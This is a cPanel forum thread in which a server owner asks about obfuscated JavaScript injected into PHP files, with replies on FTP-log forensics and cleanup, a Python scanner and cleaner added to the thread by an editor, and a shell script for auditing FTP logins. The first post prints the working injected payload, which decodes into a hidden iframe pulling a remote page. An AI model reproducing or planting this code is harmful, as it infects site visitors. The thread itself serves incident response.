Strange Code - Not Added By Me

dlwaldow

Member
Mar 18, 2013
8
0
1
cPanel Access Level
Root Administrator
I think I have some bug on my VPS (I have root access). In my index.php (and, given time, it'll spread to my header.php and footer.php too) I find this code:

Code:
<?
#3b3cf8#
echo "<script type=\"text/javascript\" language=\"javascript\" >asq=function(){return 
n[i];};ww=window;ss=String[\"fro\"+\"mC\"+\"harC\"+\"o\"+\"de\"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n=\"0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x75,0x7a,0x66,0x68,0x62,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x78,0x78,0x78,0x2f,0x71,0x73,0x6a,0x77,0x62,0x75,0x66,0x74,0x76,0x71,0x66,0x73,0x64,0x62,0x73,0x74,0x2f,0x64,0x70,0x6e,0x30,0x78,0x71,0x6a,0x6e,0x62,0x68,0x66,0x74,0x30,0x73,0x66,0x6d,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,
0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x75,0x7a,0x66,0x68,0x62,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x75,0x7a,0x66,0x68,0x62,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c\".split(\",\");h=2;s=\"\";if(whwej){for(i=0;i-510!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;ww[\"eval\"](\"\"+s);}}}}</script>";

#/3b3cf8#
?>
Does anyone know what this is and/or how to get rid of it? :/ I've had to completely reformat my server once before, but now I have a couple of clients on it and I don't want to blow their work out. It's been two to three weeks since the server reformat and this thing is back. I don't understand it. I'm not running Joomla at all. These are simple PHP files that I've created without the help of any other software. The only other things I'm running are Piwigo gallery, FanUpdate 3, phpBB (latest), and TheHostingTool. This thing was on the server (before the rebuild) and at the time phpBB and TheHostingTool weren't installed. :/
 

dlwaldow

Member
Mar 18, 2013
8
0
1
cPanel Access Level
Root Administrator
ClamAV and Maldetect found absolutely nothing at all. As for a rootkit scan, I have no idea where I can grab one for the server and install it via SSH :/
 

quietFinn

Well-Known Member
Feb 4, 2006
2,042
553
493
Finland
cPanel Access Level
Root Administrator
I have seen that a few times and every time it was uploaded using FTP, i.e. the hacker had got access to the customer's PC and got the cPanel/FTP username & password.

Check FTP access logs in /var/log/messages
 

dlwaldow

Member
Mar 18, 2013
8
0
1
cPanel Access Level
Root Administrator
I have seen that a few times and every time it was uploaded using FTP, i.e. the hacker had got access to the customer's PC and got the cPanel/FTP username & password.

Check FTP access logs in /var/log/messages

FTP access logs from a ? at the local IP. Do you know how to prevent this by chance?
 

quietFinn

Well-Known Member
Feb 4, 2006
2,042
553
493
Finland
cPanel Access Level
Root Administrator
In /var/log/messages you see if someone has connected to that account using FTP, and in that case you see the IP address they connected from. Blocking that IP does not really help, but if you see that FTP has been used to upload those changed files, then you know the method they used.

The password of that account must be changed of course, and the owner of that account (or anyone who had the password) must scan their PC very well.
 

dlwaldow

Member
Mar 18, 2013
8
0
1
cPanel Access Level
Root Administrator
I rebuilt my computer completely to get rid of the Trojan that was on it. I went back into cpanel to clean the files and am finding this instead. Is it the same thing?

Code:
<!--3b3cf8--><img src="http://localhost/" ><!--/3b3cf8-->
Code:
<?
#3b3cf8#
echo('<img src=\"http://localhost/\" >');
#/3b3cf8#
?>
Should I be going through SSH and finding all instances of this code?
 

mattsh

Registered
Sep 10, 2013
1
0
1
cPanel Access Level
Root Administrator
I'm also getting this on 2 sites on the same hosting. My personal site (hosted elsewhere) does not have this problem.

Aside from scans, does anyone have any specific ideas on how to fix this?
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,880
2,268
463
I'm also getting this on 2 sites on the same hosting. My personal site (hosted elsewhere) does not have this problem. Aside from scans, does anyone have any specific ideas on how to fix this?

I recommend consulting with a qualified system administrator to investigate your system to determine how it was exploited. Note that if your server was rooted, reinstalling the OS/cPanel and restoring the accounts is typically the best way to ensure the server is cleaned.

Thank you.
 

quizknows

Well-Known Member
Oct 20, 2009
1,008
87
78
cPanel Access Level
DataCenter Provider
I've seen this hack a ton of times. 99.99% of the time the server is not rooted: either your FTP password was used to upload the modified files, or your CMS had a weak admin password or old plugin used to modify the files.

If you're lucky and you disabled cPanel's default 24 hour deletion of access logs for Apache, you can use the timestamps of the files to consult your Apache domlogs and see if there is a malicious PHP script that was used around that time.

You will ultimately need to remove the bad code or restore the infected files from a clean backup. At that time make sure you disable domlog deletion in WHM, or enable Raw Access Log archiving in cPanel for the domain; this way if it gets "hacked" again you can track it down.
 
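A scanner and cleaner for the marked blocks, added here as an example and not posted by anyone in the thread. It looks for the `3b3cf8` markers exactly as they appear in the injected PHP and HTML above, reports each infected file's modification time (the value to line up against the FTP log and domlog entries quietFinn and quizknows describe), and can cut the blocks out in place. The file extensions list is an assumption.

```python
import os
import re
import shutil
import time

# Marker used by the injected blocks in this thread: PHP files carry
# "<? #3b3cf8# ... #/3b3cf8# ?>", HTML files "<!--3b3cf8--> ... <!--/3b3cf8-->".
MARKER = "3b3cf8"
PATTERNS = [
    re.compile(r"<\?(?:php)?\s*#" + MARKER + r"#.*?#/" + MARKER + r"#\s*\?>", re.S),
    re.compile(r"<!--" + MARKER + r"-->.*?<!--/" + MARKER + r"-->", re.S),
]
EXTENSIONS = (".php", ".html", ".htm")  # assumed set of file types to inspect

def strip_injection(text):
    """Return (cleaned_text, blocks_removed) with every marked block cut out."""
    removed = 0
    for pat in PATTERNS:
        text, n = pat.subn("", text)
        removed += n
    return text, removed

def scan_tree(root):
    """Sorted [(mtime, path, blocks)] of infected files under root; the mtime is
    what you line up against the Apache domlog / FTP log entries."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                _text, n = strip_injection(fh.read())
            if n:
                stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(os.path.getmtime(path)))
                hits.append((stamp, path, n))
    return sorted(hits)

def clean_file(path):
    """Cut the blocks out of path in place (keeps ownership/mode), saving path.bak first."""
    with open(path, encoding="utf-8", errors="surrogateescape") as fh:
        original = fh.read()
    cleaned, n = strip_injection(original)
    if n:
        shutil.copy2(path, path + ".bak")
        with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
            fh.write(cleaned)
    return n
```

Run `scan_tree()` on the account's document root first and compare the reported times with the logs; only then run `clean_file()` on each hit, or restore those files from a clean backup instead.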

Aaron.Edwards

Active Member
Sep 21, 2013
36
0
6
cPanel Access Level
Root Administrator
FTP access logs from a ? at the local IP. Do you know how to prevent this by chance?

Try this small shell script to check if someone tried to hack a user's FTP account from the same IP address:

Code:
#!/bin/sh
# Pure-FTPd writes lines like this to /var/log/messages:
#   Mar 18 10:00:00 host pure-ftpd: (user@1.2.3.4) [INFO] user is now logged in
# Field 6 is "(user@ip)"; "(?@ip)" is a connection that never authenticated, so skip it.

# Collect every distinct (ip, user) pair, then keep IPs that logged in as more than 2 accounts.
awk '/pure-ftpd: \([^?].*/ { print $6 }' /var/log/messages* |
sed 's/^(\(.*\))/\1/' |
awk -F@ '{ if ($2) print $2 " " $1 }' |
sort | uniq |
awk '{print $1}' |
uniq -c |
awk '{if ($1 > 2) print $2}' |
while read ipaddr; do
    # For each such IP, list the account names it authenticated as.
    echo "${ipaddr}:"
    awk '/pure-ftpd: \([^?].*@'"${ipaddr}"'\)/' /var/log/messages* |
    sed 's/^.*(\([a-zA-Z0-9_][a-zA-Z0-9_]*\)@.*/\1/' |
    sort | uniq
done